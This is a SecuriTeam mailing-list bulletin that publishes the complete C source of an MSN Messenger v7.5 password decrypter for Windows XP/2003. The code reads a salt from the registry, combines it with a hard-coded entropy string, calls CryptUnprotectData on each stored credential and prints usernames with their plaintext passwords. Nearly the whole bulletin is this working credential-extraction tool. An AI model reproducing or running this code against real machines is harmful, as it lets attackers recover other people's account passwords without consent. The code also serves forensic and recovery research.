[TOOL] MSN Messenger v7.5 Password Decrypter for Windows XP / 2003

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



MSN Messenger v7.5 Password Decrypter for Windows XP / 2003
------------------------------------------------------------------------


SUMMARY



DETAILS

The following tool will try to decrypt the MSN Messenger passwod stored in
the Registry.

/*
* MSN Messenger v7.5 Password Decrypter Source Code for Windows XP &
2003
* (Compiled - VC++ 2005, Tested on WinXP SP2, MSN Messenger v7.5.0324)
* - Gregory R. Panakkal
* http://www.infogreg.com/
*/

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#include <WinCred.h>
#include <tchar.h>

#pragma comment(lib, "Crypt32.lib")

void showBanner()
{
_tprintf(_T("MSN Messenger v7.5 Password Decrypter for Windows
XP/2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com
\n\n"));
}

////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL* CredentialCollection = NULL;
DATA_BLOB blobCrypt;
DATA_BLOB blobPlainText;
DATA_BLOB blobEntropy;
DATA_BLOB blobDynEntropy;
HKEY hKeyDynSalt = NULL;
HKEY hKeyCreds = NULL;
HKEY hKeyUserCred = NULL;
DWORD dwRet = 0;
DWORD dwType = 0;
DWORD dwDataSize = 0;
DWORD dwTemp = 0;
PBYTE pDynamicSalt = NULL;
PBYTE pEncPassword = NULL;
TCHAR szMsgrUserName[MAX_PATH];
DWORD dwCount = 0;
REGSAM RegSAM = KEY_READ;
WCHAR szEntropy[] = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";

ZeroMemory(&blobCrypt, sizeof(blobCrypt) );
ZeroMemory(&blobPlainText, sizeof(blobPlainText) );
ZeroMemory(&blobEntropy, sizeof(blobEntropy) );
ZeroMemory(&blobDynEntropy, sizeof(blobDynEntropy) );

showBanner();

do
{
//
// Allocate some memory!
//
pEncPassword = (PBYTE)malloc( MAX_PATH );

if(NULL == pEncPassword)
{
_tprintf(_T("ERROR: malloc failed!"));
break;
}


//
// Fetch & Calculate Dynamic Salt
//
dwRet = RegOpenKeyEx(
HKEY_CURRENT_USER,
_T("SOFTWARE\\MICROSOFT\\IdentityCRL\\Dynamic Salt"),
0,
RegSAM,
&hKeyDynSalt
);

if(ERROR_SUCCESS != dwRet)
{
_tprintf(_T("ERROR: Cannot opening dynamic salt reg key!"));
break;
}

dwTemp = sizeof(dwDataSize);

dwRet = RegQueryValueEx(
hKeyDynSalt,
_T("Size"),
NULL,
&dwType,
(LPBYTE)&dwDataSize,
&dwTemp
);

if( ERROR_SUCCESS != dwRet ||
REG_DWORD != dwType ||
sizeof(DWORD) != dwTemp )
{
_tprintf(_T("ERROR: Cannot fetch dynamic salt data size!"));
break;
}

pDynamicSalt = (PBYTE)malloc( dwDataSize );

if(NULL == pDynamicSalt)
{
_tprintf(_T("ERROR: malloc failed!"));
break;
}

dwTemp = dwDataSize;

dwRet = RegQueryValueEx(
hKeyDynSalt,
_T("Value"),
NULL,
&dwType,
(LPBYTE)pDynamicSalt,
&dwTemp);


if( ERROR_SUCCESS != dwRet ||
REG_BINARY != dwType ||
dwDataSize != dwTemp )
{
_tprintf(_T("ERROR: Cannot fetch dynamic salt data!"));
break;
}

//Initial Crypt Blob
blobCrypt.pbData = (LPBYTE)pDynamicSalt;
blobCrypt.cbData = dwDataSize;


//Initialize Entropy Blob
blobEntropy.pbData = (LPBYTE)&szEntropy;
blobEntropy.cbData = 0x40;

if(FALSE == CryptUnprotectData(
&blobCrypt,
NULL,
&blobEntropy,
NULL,
NULL,
1,
&blobPlainText
))
{
//something
break;
}

//
// Construct the 128 Char long Entropy value
//

memcpy(
blobCrypt.pbData,
blobEntropy.pbData, blobEntropy.cbData
);

memcpy(
blobCrypt.pbData + blobEntropy.cbData,
blobPlainText.pbData,
blobPlainText.cbData
);

blobEntropy.cbData += blobPlainText.cbData;
blobEntropy.pbData = blobCrypt.pbData;


//Free memory & Zero-off Blob structure
LocalFree(blobPlainText.pbData);
ZeroMemory(&blobPlainText, sizeof(blobPlainText));


//
// Enumerate all the stored credentials in the registry
//

dwRet = RegOpenKeyEx(
HKEY_CURRENT_USER,
_T("SOFTWARE\\MICROSOFT\\IdentityCRL\\Creds"),
0,
RegSAM,
&hKeyCreds
);

if(ERROR_SUCCESS != dwRet)
{
_tprintf(_T("ERROR: Cannot opening credential key!"));
break;
}

while( true )
{
dwRet = RegEnumKey(
hKeyCreds,
dwCount,
(LPTSTR)&szMsgrUserName,
MAX_PATH
);

if( ERROR_SUCCESS != dwRet )
{
break;
}

dwRet = RegOpenKeyEx(
hKeyCreds,
szMsgrUserName,
0,
RegSAM,
&hKeyUserCred
);

if(ERROR_SUCCESS == dwRet)
{
dwTemp = MAX_PATH;


//
// Read encrypted passsword
//

dwRet = RegQueryValueEx(
hKeyUserCred,
_T("ps:password"),
NULL,
&dwType,
(LPBYTE)pEncPassword,
&dwTemp);

if( ERROR_SUCCESS == dwRet &&
REG_BINARY == dwType )
{
blobCrypt.pbData = (LPBYTE)pEncPassword;
blobCrypt.cbData = dwTemp;

//
// Decrypt & Display Credential Info!
//
if(TRUE == CryptUnprotectData(
&blobCrypt,
NULL,
&blobEntropy,
NULL,
NULL,
1,
&blobPlainText
))
{
_tprintf(
_T("Username : %s\nPassword : %ws\n\n"),
szMsgrUserName,
blobPlainText.pbData
);

LocalFree(blobPlainText.pbData);
}
}

//Close User Cred Key
RegCloseKey(hKeyUserCred);
hKeyUserCred = NULL;
}

dwCount++;
}

}while(false);


if(NULL != pDynamicSalt)
{
free(pDynamicSalt);
}

if(NULL != pEncPassword)
{
free(pEncPassword);
}

if(NULL != hKeyCreds)
{
RegCloseKey(hKeyCreds);
}

if(NULL != hKeyDynSalt)
{
RegCloseKey(hKeyDynSalt);
}
}


ADDITIONAL INFORMATION

To keep updated with the tool visit the project's homepage at:
<http://www.infogreg.com/source-code/gpl/msn-messenger-v7.5-password-decrypter-for-winxp-and-win2k3.html> http://www.infogreg.com/source-code/gpl/msn-messenger-v7.5-password-decrypter-for-winxp-and-win2k3.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.